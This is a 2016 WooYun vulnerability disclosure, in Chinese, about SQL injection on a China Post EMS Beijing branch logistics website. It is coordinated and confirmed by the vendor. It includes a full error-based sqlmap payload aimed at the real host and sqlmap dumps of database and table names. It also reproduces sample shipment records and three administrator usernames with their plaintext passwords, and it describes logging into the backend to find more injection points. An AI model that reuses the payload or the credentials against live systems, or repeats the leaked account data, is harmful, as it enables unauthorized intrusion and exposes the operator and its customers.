当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0194358

漏洞标题:中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

相关厂商:中国邮政集团公司信息技术局

漏洞作者: 路人甲

提交时间:2016-04-09 20:05

修复时间:2016-05-24 20:20

公开时间:2016-05-24 20:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

多个地方SQL注入

详细说明:

http://www.bj-cnpl.com


中 国 邮 政 速 递 物 流 股 份 有 限 公 司 北 京 市 分 公 司
系统多处存在SQL注入,泄露一些运单信息

http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1


运单.png


orderno存在SQL注入

current user:    'cnpluser'


Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] AT
[*] ATRACK
[*] master
[*] model
[*] msdb
[*] tempdb


Database: ATRACK
[19 tables]
+---------------------+
| CNPL_DNJ_REDOC |
| Logistic_DNJ |
| Logistic_POD_Status |
| Logistic_Russia |
| Logistic_Shipment |
| Logistic_State |
| Logistic_Upload_D |
| Logistic_Upload_I |
| Logistic_Upload_M |
| Logistic_User |
| MAN_DT |
| MAN_HD |
| atrackdssw21 |
| atrackdssw22 |
| atrackdssw23 |
| atrackdssw24 |
| atrackdssw25 |
| sysdiagrams |
| 中邮与俄方状态对照表|
+---------------------+


Database: ATRACK
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.Logistic_State | 1641873 |转运信息
| dbo.CNPL_DNJ_REDOC | 348257 |
| dbo.Logistic_Upload_I | 1259 |
| dbo.Logistic_Upload_M | 1237 |
| dbo.Logistic_Shipment | 941 |
| dbo.Logistic_POD_Status | 47 |
| dbo.Logistic_Russia | 23 |
| dbo.MAN_DT | 17 |
| dbo.Logistic_User | 11 |
| dbo.Logistic_Upload_D | 6 |
| dbo.MAN_HD | 6 |
| dbo.Logistic_DNJ | 1 |
+-------------------------+---------+


Table: Logistic_State
[3 entries]
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| Logistic_State_ID | Logistic_State_No | Logistic_State_DT | Logistic_State_Eng | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| 10000 | BPIL870050205 | 11 20 2012 1:18PM | Arrived on an airport warehouse | 到达机场监管中心 | admin | Arrived on an airport warehouse | Moscow, Russia | 11 10 2012 3:00PM | <blank> | <blank> | STA 56 |
| 100000 | CT287578855CN | 02 27 2014 9:06AM | Shipment Out of Delivery | 快件外出派送 | admin | <blank> | CANADA | 02 26 2014 12:19PM | <blank> | <blank> | SH003 |
| 1000000 | 98723A925 | 09 22 2015 8:25AM | Shipment forwarded | 快件转运 | admin | <blank> | 东莞 | 09 22 2015 6:57AM | <blank> | <blank> | SH272 |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+

漏洞证明:

用户密码什么的没有加密

+------------------+--------------------+---------------------+-----------------------+------------------------+
| Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
+------------------+--------------------+---------------------+-----------------------+------------------------+
| 1 | admin | ADMIN | YES | lzyouzheng |
| 10 | emskf | ADMIN | YES | kefuzhongxin |
| 11 | guoji | ADMIN | YES | guojifengongsi |
+------------------+--------------------+---------------------+-----------------------+------------------------+


登陆后台,发现后台又有SQL注入
新添加状态,填入“'”

添加状态.png


添加状态2.png


添加状态3.png


另外两处

SQL.png


SQL1.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-09 20:12

厂商回复:

谢谢。

最新状态:

暂无


漏洞评价:

评价